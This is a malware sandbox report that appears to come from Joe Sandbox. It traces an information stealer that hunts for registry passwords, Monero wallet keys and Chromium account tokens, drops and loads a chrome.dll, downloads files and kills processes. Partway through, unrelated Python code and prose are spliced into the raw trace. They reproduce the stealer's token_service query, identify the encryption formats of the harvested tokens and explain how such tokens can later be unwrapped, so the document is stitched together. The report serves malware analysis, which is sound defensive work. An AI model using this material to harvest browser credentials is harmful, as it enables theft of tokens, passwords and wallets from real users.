                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 8406dd5705d755b798d1832432f42f78fff67f332c4dbdfe52cba3a73970a6d6
                                    • Instruction ID: 714cf0c862bf18ba78c92a75665f2f3a3f495494d4352a79ee64d88d445c93a7
                                    • Opcode Fuzzy Hash: 8406dd5705d755b798d1832432f42f78fff67f332c4dbdfe52cba3a73970a6d6
                                    • Instruction Fuzzy Hash: B7413C35A10258AFCB24EFA4DC95FED7778FB48744F204198F509AB190CBB0AE84DB64
                                    APIs
                                      • Part of subcall function 00C87330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C8739A
                                      • Part of subcall function 00C87330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C87411
                                      • Part of subcall function 00C87330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C8746D
                                      • Part of subcall function 00C87330: GetProcessHeap.KERNEL32(00000000,?), ref: 00C874B2
                                      • Part of subcall function 00C87330: HeapFree.KERNEL32(00000000), ref: 00C874B9
                                    • lstrcat.KERNEL32(00000000,00CA192C), ref: 00C87666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C876A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00C876BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C876EF
                                    • lstrcat.KERNEL32(00000000,00CA1934), ref: 00C87700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C87733
                                    • lstrcat.KERNEL32(00000000,00CA1938), ref: 00C8774D
                                    • task.LIBCPMTD ref: 00C8775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: a5e26042903871bb1767862e179439ead2427936ec69a7584751730d2ee916c0
                                    • Instruction ID: e9105417fbc6458e0a37de99e31021a0b9a713b096dd53b7099641327fccb113
                                    • Opcode Fuzzy Hash: a5e26042903871bb1767862e179439ead2427936ec69a7584751730d2ee916c0
                                    • Instruction Fuzzy Hash: 0F316072904309DBDB04FBA0EC99DFF7379AB45306F504218F202636A1DF34A949EB94
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0152DD58,00000000,?,00CA0E14,00000000,?,00000000), ref: 00C982C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C982C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C982E8
                                    • __aulldiv.LIBCMT ref: 00C98302
                                    • __aulldiv.LIBCMT ref: 00C98310
                                    • wsprintfA.USER32 ref: 00C9833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: 9941e34ec3985e25c6cf787644011bcf6208b1d842d09fe7f521d7b3574ba62a
                                    • Instruction ID: 97a506fd098bb1e88e65ae264e0509184f9e0609ebfbdc43de67bb2b7d19fa73
                                    • Opcode Fuzzy Hash: 9941e34ec3985e25c6cf787644011bcf6208b1d842d09fe7f521d7b3574ba62a
                                    • Instruction Fuzzy Hash: 3E2136B1E44308ABDB00DFD4DD4AFAEB7B8FB45B14F104519F215BB280C77869048BA4
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                    • InternetOpenA.WININET(00CA0DFB,00000001,00000000,00000000,00000000), ref: 00C8615F
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C861DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C86203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00C86299
                                    • InternetCloseHandle.WININET(?), ref: 00C862A3
                                    • InternetCloseHandle.WININET(00000000), ref: 00C862B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 9423e56d419184b674cd5fa313e83bdb58552dd7eab59b5aaa6fd8f16413f7fd
                                    • Instruction ID: 7d6dc23ff57d91c9dfaa44082b52571e1c966d61c20650623225eb8b50d850a3
                                    • Opcode Fuzzy Hash: 9423e56d419184b674cd5fa313e83bdb58552dd7eab59b5aaa6fd8f16413f7fd
                                    • Instruction Fuzzy Hash: DD5142B1A00318ABDF20EFA0DC49BEE7779AB44305F104198F605A71C1DB746B89DF99
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 00D0024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 00D0035B
                                    • CatchIt.LIBVCRUNTIME ref: 00D003AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 00D004C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: af384b6cb69cf5cf8cb6f078b4b7cab20ff9989a6c28c728400e81e33c730142
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 52B18C71800209EFCF15DFA4C885BAEBBB5FF04314F18416AE9196B292D731DA51CBB6
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C8739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C87411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C8746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C874B2
                                    • HeapFree.KERNEL32(00000000), ref: 00C874B9
                                    • task.LIBCPMTD ref: 00C875B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 7b33db68cd4845baa2ee1e9caa476eee081ddaddedb5ce4bc60f1f8f03ea0235
                                    • Instruction ID: a09d1740f90656a9cf8cf3475a5438f57bda815705b3123cd9a6b49748614608
                                    • Opcode Fuzzy Hash: 7b33db68cd4845baa2ee1e9caa476eee081ddaddedb5ce4bc60f1f8f03ea0235
                                    • Instruction Fuzzy Hash: AE613DB180426C9BDB24EB50CC45BDAB7B8BF44304F1081E9E649A6141EF70ABC9DFA4
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BC6F
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C8BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BD75
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: d878f889aed26e0279be7e53e0665c58a1cb5f851d331896b77e0a040f32abe5
                                    • Instruction ID: 5994d252ef87571ba929957556d0df3c4203673c56cc3bc2f479376037bc8deb
                                    • Opcode Fuzzy Hash: d878f889aed26e0279be7e53e0665c58a1cb5f851d331896b77e0a040f32abe5
                                    • Instruction Fuzzy Hash: 99B15072910208ABCF04FBA0DDAAEEE7379AF14305F404569F50667191EF346F48DBA2
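The entry above pairs the "AccountId" / "AccountTokens" string searches with the query `SELECT service, encrypted_token FROM token_service`. That table lives in a Chromium profile's "Web Data" SQLite database and holds OAuth refresh tokens, one row per account with the service column prefixed "AccountId-", the value protected by Chromium's os_crypt (on Windows either a user-scoped DPAPI blob or, since the "v10" format, AES-256-GCM with a 12-byte nonce, the AES key itself being DPAPI-wrapped in the profile's Local State). The Python below is an added example, not the sample's code and not Joe Sandbox output: it builds a constructed stand-in database with that one table (the schema is assumed from Chromium's source; real profiles carry many more tables), runs the exact query the stealer issues, and reports which container format each harvested blob is in without decrypting anything.

```python
"""Added example: what the token_service query in the trace reads (not sample code)."""
import sqlite3

# The query string exactly as recovered from the sample's memory.
STEALER_QUERY = "SELECT service, encrypted_token FROM token_service"

# os_crypt container formats found in Chromium profiles on Windows.
V10_PREFIX = b"v10"                      # AES-256-GCM; key DPAPI-wrapped in Local State
V10_NONCE_LEN, GCM_TAG_LEN = 12, 16
# DPAPI blob header: version 1 + provider GUID {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB}
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000" "d08c9ddf0115d1118c7a00c04fc297eb")


def build_web_data(rows):
    """Constructed in-memory stand-in for the profile's 'Web Data' database.
    Assumption: token_service(service, encrypted_token) as in Chromium's schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE token_service "
               "(service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)")
    db.executemany("INSERT INTO token_service VALUES (?, ?)", rows)
    return db


def classify_blob(blob: bytes) -> str:
    """Name the os_crypt container by its prefix; no key material is needed."""
    if blob.startswith(V10_PREFIX):
        return "os_crypt-v10-aes-gcm"
    if blob.startswith(DPAPI_BLOB_MAGIC):
        return "dpapi-blob"
    return "unrecognised"


def split_v10(blob: bytes):
    """Return (nonce, ciphertext, tag) of a v10 container without decrypting it."""
    if not blob.startswith(V10_PREFIX) or len(blob) < len(V10_PREFIX) + V10_NONCE_LEN + GCM_TAG_LEN:
        raise ValueError("not a v10 container")
    body = blob[len(V10_PREFIX):]
    return body[:V10_NONCE_LEN], body[V10_NONCE_LEN:-GCM_TAG_LEN], body[-GCM_TAG_LEN:]


def harvest(db):
    """Run the stealer's own query and describe what each row would hand over."""
    out = []
    for service, token in db.execute(STEALER_QUERY):
        token = bytes(token)
        out.append({"service": service,
                    "format": classify_blob(token),
                    # the StrStrA("AccountId") in the trace matches this prefix
                    "account_row": service.startswith("AccountId-"),
                    "bytes": len(token)})
    return out


# Constructed rows: the token bytes are arbitrary filler, not real tokens.
SAMPLE_ROWS = [
    ("AccountId-1100000000", V10_PREFIX + bytes(range(12)) + b"\xaa" * 40 + b"\xbb" * 16),
    ("legacy-service", DPAPI_BLOB_MAGIC + b"\x00" * 60),
]

if __name__ == "__main__":
    for row in harvest(build_web_data(SAMPLE_ROWS)):
        print(row)
```

The point for an analyst is that the stealer does not need to understand these blobs at collection time: it copies the rows and the profile's Local State, and the v10 key can be unwrapped later by any process running as the same user. A DPAPI-format row is the older layout and is bound to the user in the same way.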
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4b7231116256f8c647a167ed1c6b070f65acd3c7bf0fd67f042bf5da8e441898
                                    • Instruction ID: 4ad337c0d6a6c3cd65a3b42bfd2ea3449ac68c9fbc05411f57e981ee728209f9
                                    • Opcode Fuzzy Hash: 4b7231116256f8c647a167ed1c6b070f65acd3c7bf0fd67f042bf5da8e441898
                                    • Instruction Fuzzy Hash: DBF0D431948349EFD744AFE0B90979CBB74AB04B07F114199E71A961D0CE705A90ABA1
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C99850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00C908DC,C:\ProgramData\chrome.dll), ref: 00C99871
                                      • Part of subcall function 00C8A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C8A098
                                    • StrCmpCA.SHLWAPI(00000000,01528950), ref: 00C90922
                                    • StrCmpCA.SHLWAPI(00000000,015288C0), ref: 00C90B79
                                    • StrCmpCA.SHLWAPI(00000000,01528870), ref: 00C90A0C
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C90C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00C90C30
                                    • C:\ProgramData\chrome.dll, xrefs: 00C908CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 7b9bf5edd1bcbe7676f8079cf59ca03b07e251b21e1d85aecdc14d4c51cbafe3
                                    • Instruction ID: 4f8a60417f96fc15471812faffbb3c5b647f8abcb45430d0842226f2c1afec0c
                                    • Opcode Fuzzy Hash: 7b9bf5edd1bcbe7676f8079cf59ca03b07e251b21e1d85aecdc14d4c51cbafe3
                                    • Instruction Fuzzy Hash: 42A153717002089FCF28FF64D996AAD77BAAF95304F10816DE80A9F251DE309A05DBD6
                                    APIs
                                      • Part of subcall function 00C98CF0: GetSystemTime.KERNEL32(00CA0E1B,0152A068,00CA05B6,?,?,00C813F9,?,0000001A,00CA0E1B,00000000,?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C98D16
                                    • wsprintfA.USER32 ref: 00C89E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C89F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00C89F17
                                    • lstrcat.KERNEL32(00000000,00CA12D8), ref: 00C89F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00C89F7C
                                    • Sleep.KERNEL32(00001388), ref: 00C8A013
                                      • Part of subcall function 00C999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C999C5
                                      • Part of subcall function 00C999A0: Process32First.KERNEL32(00C8A056,00000128), ref: 00C999D9
                                      • Part of subcall function 00C999A0: Process32Next.KERNEL32(00C8A056,00000128), ref: 00C999F2
                                      • Part of subcall function 00C999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C99A4E
                                      • Part of subcall function 00C999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C99A6C
                                      • Part of subcall function 00C999A0: CloseHandle.KERNEL32(00000000), ref: 00C99A79
                                      • Part of subcall function 00C999A0: CloseHandle.KERNEL32(00C8A056), ref: 00C99A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
